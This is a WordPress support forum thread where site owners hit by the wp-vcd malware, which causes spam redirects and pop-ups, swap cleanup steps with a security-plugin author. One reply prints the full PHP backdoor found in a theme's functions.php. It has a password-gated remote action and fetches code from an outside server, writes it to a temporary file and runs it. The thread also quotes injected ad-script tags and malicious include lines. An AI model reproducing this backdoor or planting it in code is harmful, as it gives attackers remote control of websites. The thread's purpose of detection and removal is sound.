Can’t find the backdoor (malware)

  • Resolved kvandelaak

    (@kvandelaak)


    7 years, 7 months ago

    Everytime I browse to my website. I get redirected to some spam sites. On mobile it gives me an uber popup msg. I found some strings with your app but can’t remove it.

    this is what I see through firefox dev view

    <script async=”async” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1″></script>
    <script type=”text/javascript” src=”//go.pub2srv.com/apu.php?zoneid=1063894″></script>

    On every page this code comes back but no idea where it hides in the WordPress php.

    please help!

    • This topic was modified 7 years, 7 months ago by kvandelaak.
    • This topic was modified 6 years, 10 months ago by Jan Dembowski.

    The page I need help with: [log in to see the link]

Viewing 15 replies - 1 through 15 (of 19 total)
  • Plugin Author Eli

    (@scheeeli)

    Make sure you have downloaded the latest definition updates, then my plugin should be able to remove that threat for you. If not then please post a screenshot so I can see what the problem might be.

    @kvandelaak Have yo managed to solve problem? I have the same script and I dont know where to find it and how it appeared.

    @scheeeli I updated your plugin but it didn;t find anything on my site.
    This is my two infected sites:
    storeposter.pl
    brevisforte.ariel1.usermd.net

    Can you help me guys please?

    Thread Starter kvandelaak

    (@kvandelaak)

    Hi,

    I managed to get rid of it for now.
    Check your functions.php and remove the infected code. (on the top of the php)
    Mine was also in the index.php and I replaced this with the original index.php.

    No more pop ups.

    Plugin Author Eli

    (@scheeeli)

    @kvandelaak,
    Can you please send me those infected files that you found so that I can add that malicious code to my definition updates?

    A Studiogyn – Solu??es para web tem a solu??o para este problema, acesse https://www.studiogyn.com.br e solicite uma varredura em seu site!

    • This reply was modified 7 years, 7 months ago by studiogyn.

    I can’t find it anywhere. I checked everything. Can you please send this code? Because I don’t know what to do at all…

    Plugin Author Eli

    (@scheeeli)

    Both of these variants are in my latest definition update ??

    Plugin Author Eli

    (@scheeeli)

    Thanks for posting this additional code. I have added this new variation to my definition updates.

    There are more that changed.
    check these files in your host:
    /wp-includes/post.php
    /wp-includes/class.wp.php (delete this file)
    /wp-includes/wp-vcd.php (delete this file)
    at the beginning of you post.php file you may see this

    <?php if (file_exists(dirname(__FILE__) . ‘/wp-vcd.php’)) include_once(dirname(__FILE__) . ‘/wp-vcd.php’); ?>

    remove it!

    Don’t forget to remove the code that inserted at beginning of your functions.php file in /wp-content/themes/YOUR_THEME/ (see others reply in above)

    Plugin Author Eli

    (@scheeeli)

    @b3hz4d,
    Can you send me those infected files so that I can add them to my definition updates:
    /wp-includes/post.php
    /wp-includes/class.wp.php
    /wp-includes/wp-vcd.php
    and your functions.php

    in my case you miss the file that loaded the setup to do all this: class.theme-modules the code was in function.php as: <?php if (file_exists(dirname(__FILE__) . ‘/class.theme-modules.php’)) include_once(dirname(__FILE__) . ‘/class.theme-modules.php’); ?><?php this file has over 200 lines of code all creating the files class.wp wp-vcd ect..

    Plugin Author Eli

    (@scheeeli)

    Can you please email me any of those files that my scanner missed?

    You can email the attachments to:
    eli AT gotmls DOT net

    Ok i read everything, on my fuction php i got this code, seems added before the other php code:

    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '8a845db26a51550b6689d695fb7b9ca1'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

				
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

	

if ( ! function_exists( 'wps_temps_setups' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

if($tmpcontent = @file_get_contents("https://www.dolsh.com/code5.php?i=".$path))
{

function wps_temps_setups($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wps_temps_setups");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wps_temps_setups($tmpcontent));
}
}
}

?>

    I don’t know what to do.
    I removed it, but nothing change

    Edit.
    – i removed the code in function.php
    – i removed the code in post.php
    – i removed the two files created

    Now i have popup only at the first load of the page and at the first click, not at everyone.
    90% fixed ??

    Some fixed had the final solution? where is the last part of the code?

    • This reply was modified 7 years, 2 months ago by balooo.
    • This reply was modified 7 years, 2 months ago by balooo.
    • This reply was modified 7 years, 2 months ago by Steven Stern (sterndata). Reason: put code in backticks
    • This reply was modified 7 years, 2 months ago by balooo.

    I found the file class.plugin-modules.php in the plugin that I downloaded, wp-vcd.php file comes from this file, for you who like to download nulled plugin or themes my suggestions before doing the installation try check first whether there is this file or not. I hope this helps

    b3hz4d (@b3hz4d) gave a solution and that is working well except on thing I would like to add because i have faced the same issue of onclkad malware and i have finally resolved it. The complete solution is

    1. DELETE THIS FILE /wp-includes/class.wp.php
    2. DELETE THIS FILE /wp-includes/wp-vcd.php
    3. REMOVE BELOW GIVE CONTENT FROM THIS FILE /wp-includes/post.php

    if (file_exists(dirname(__FILE__) . ‘/wp-vcd.php’)) include_once(dirname(__FILE__) . ‘/wp-vcd.php’); ?>

    4. Look for an additional folder in your \wp-content\plugins\ folder. This folder contain the main source. Locate it and delete this folder and you are all done. In my case the folder names in my two installations were \wp-content\plugins\wp-smushit\ AND \wp-content\plugins\wordpress-seo\ .

    5. After completing above four steps, delete cache before accessing your site. You are all done. Enjoy.

    Hayat
    techibeez.com.au

    • This reply was modified 7 years, 2 months ago by hayat5050.
Viewing 15 replies - 1 through 15 (of 19 total)
  • The topic ‘Can’t find the backdoor (malware)’ is closed to new replies.